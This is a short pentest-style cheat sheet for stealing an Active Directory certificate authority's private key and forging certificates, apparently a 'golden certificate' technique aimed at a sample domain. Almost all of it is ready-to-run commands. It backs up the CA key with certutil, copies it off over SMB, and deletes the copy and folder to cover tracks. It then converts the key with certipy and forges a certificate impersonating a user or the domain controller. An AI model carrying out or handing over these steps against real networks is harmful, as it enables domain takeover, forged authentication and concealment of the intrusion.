Backup and extract manually:
Cmd > certutil -backupkey -f -p Passw0rd! C:\Windows\CABackup
$ smbclient.py -k -no-pass CA01.megacorp.local
# use c$
# cd windows/CABackup
# get CorpCA.p12
# rm CorpCA.p12
# cd ..
# rmdir CABackup
P12 to PFX:
$ certipy cert -pfx CorpCA.p12 -password 'Passw0rd!' -export -out CorpCA.pfx
Get CRL from the DC:
$ </dev/null openssl s_client -connect <DC_IP>:636 | openssl x509 > dc.crt
$ certipy ca -backup -ca CorpCA -k -no-pass -target CA01.megacorp.local -dc-ip 192.168.1.11 -ns 192.168.1.11
$ certipy forge -ca-pfx CorpCA.pfx -upn '[email protected]' (or -dns DC01.megacorp.local) -subject 'CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local' -crl 'ldap://***'